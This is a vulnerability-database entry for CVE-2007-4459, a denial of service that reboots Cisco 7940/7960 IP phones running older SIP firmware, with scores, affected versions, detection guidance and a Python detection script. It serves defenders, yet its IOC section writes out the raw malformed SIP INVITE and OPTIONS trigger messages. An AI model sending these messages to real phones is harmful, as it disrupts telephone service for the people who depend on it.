CVE-2007-4459
published 2007-08-21

Priority: P431
CVSS 2.0: 7.1 (high), AV:N/AC:M/Au:N/C:N/I:N/A:C
EXPLOIT
EPSS: 13.99% (96.1th percentile)
Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.

Affected

6 ranges

Vendor  Product             Version range  Fixed in
cisco   voip_phone_cp-7940  <= 8.70
cisco   voip_phone_cp-7940
cisco   voip_phone_cp-7940
cisco   voip_phone_cp-7940
cisco   voip_phone_cp-7940
cisco   voip_phone_cp-7960  <= 8.70

Detection & IOCs (extracted from sources)

command: INVITE sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: [email protected]\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n
command: OPTIONS sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: [email protected]\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n
command: OPTIONS sip:<user>@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP <src>;rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01@<src>\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n
command: INVITE sip:invaliduser@<target> SIP/2.0\r\nVia: SIP/2.0/UDP <src>;branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08@<src>\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286
port: UDP/5060
  • Detect the exploit's characteristic sequence: an INVITE with a tab character (\t) in the Via header followed by OPTIONS messages sharing the same Call-ID, which is the 3-message variant trigger.
  • Flag SIP INVITE or OPTIONS messages addressed to 'invaliduser' or using 'invalidURL' as the Request-URI host, as these are explicit exploit markers in the 10-message PoC.
  • Alert on multiple SIP INVITE/OPTIONS messages sent in rapid succession (within ~45 seconds) to the same Cisco IP Phone target over UDP, especially when Call-IDs are reused across different transaction types.
  • Monitor for SIP INVITE messages with a To: header that includes a 'tag=' parameter on initial requests (tag in To is only valid in responses/re-INVITEs), as seen in the 3-message PoC — this is a malformed SIP indicator.
  • Scope detection to the Voice VLAN; the advisory explicitly states the attacker must have access to the voice VLAN network segment where affected devices reside.
  • Only Cisco 7940 and 7960 IP Phones running firmware version 8.6 and prior are vulnerable; firmware version 8.7 contains the fix and is not affected.
  • CVE-2007-5583 is a distinct but related vulnerability affecting the same device (Cisco IP Phone 7940 firmware P0S3-08-7-00) triggered specifically by SIP INVITE Request-URIs lacking a username; do not conflate detection signatures for the two CVEs.
  • The vulnerability is a state management bug: the phone corrupts its state table when processing the specific SIP message sequence, resulting in a crash and reboot rather than arbitrary code execution.
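
The detection bullets above can be combined into one stateful check over SIP requests already captured on UDP/5060 of the voice VLAN. This is an added example, not code from this page or from Cisco's advisory; the function names, reason labels and the sample capture (documentation-range addresses) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

def parse_sip(raw):
    """Split one SIP request into method, Request-URI and lower-cased headers."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.lstrip(" ")  # drop spaces, keep tabs
    return method, uri, headers

def analyze(stream, window=45.0):
    """stream: (timestamp, dst_ip, raw_request) in capture order -> {(dst, call_id): reasons}."""
    history, alerts = defaultdict(list), defaultdict(set)  # history: key -> [(ts, method)]
    for ts, dst, raw in stream:
        method, uri, h = parse_sip(raw)
        key = (dst, h.get("call-id", "").strip())
        recent = {m for t, m in history[key] if ts - t <= window}
        if "\t" in h.get("via", ""):
            alerts[key].add("tab-in-via")
        # A To tag is normal on re-INVITEs, so flag it only on the first request of a Call-ID.
        if method == "INVITE" and not history[key] and re.search(r";\s*tag=", h.get("to", "")):
            alerts[key].add("to-tag-on-initial-invite")
        if re.search(r"^sips?:invaliduser@|@invalidurl$", uri, re.I):
            alerts[key].add("poc-marker-uri")
        if {"INVITE", "OPTIONS"} <= recent | {method}:
            alerts[key].add("invite-options-share-call-id")
        history[key].append((ts, method))
    return dict(alerts)

def req(method, uri, via, to, call_id):
    """Build a constructed sample request (test data only, never sent anywhere)."""
    return (f"{method} {uri} SIP/2.0\r\nVia: {via}\r\nFrom: <sip:a@198.51.100.7>;tag=1\r\n"
            f"To: {to}\r\nCall-ID: {call_id}\r\nCSeq: 1 {method}\r\nContent-Length: 0\r\n\r\n")

PHONE = "192.0.2.10"  # constructed address (documentation range)
SAMPLE = [            # constructed capture, not real traffic
    (0.0, PHONE, req("INVITE", "sip:1001@192.0.2.10", "SIP/2.0/UDP\t198.51.100.7;branch=00",
                     "<sip:1001@192.0.2.10>;tag=00", "c1@198.51.100.7")),
    (1.0, PHONE, req("OPTIONS", "sip:1001@192.0.2.10", "SIP/2.0/UDP 198.51.100.7;branch=01",
                     "<sip:1001@192.0.2.10>", "c1@198.51.100.7")),
    (2.0, PHONE, req("INVITE", "sip:1001@192.0.2.10", "SIP/2.0/UDP 198.51.100.8;branch=z9hG4bKa1",
                     "<sip:1001@192.0.2.10>", "c2@198.51.100.8")),
    (3.0, PHONE, req("OPTIONS", "sip:1001@invalidURL", "SIP/2.0/UDP 198.51.100.9;branch=02",
                     "<sip:1001@invalidURL>", "c3@198.51.100.9")),
]
print(analyze(SAMPLE))
```

Only the first and last Call-IDs in the sample are reported; the ordinary INVITE in between produces no alert. Keep the rule scoped to 7940/7960 phones on pre-8.7 SIP firmware so it is not confused with signatures for CVE-2007-5583.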

CVSS provenance

nvd: v2.0, 7.1 HIGH, AV:N/AC:M/Au:N/C:N/I:N/A:C
vendor_cisco: 7.1 HIGH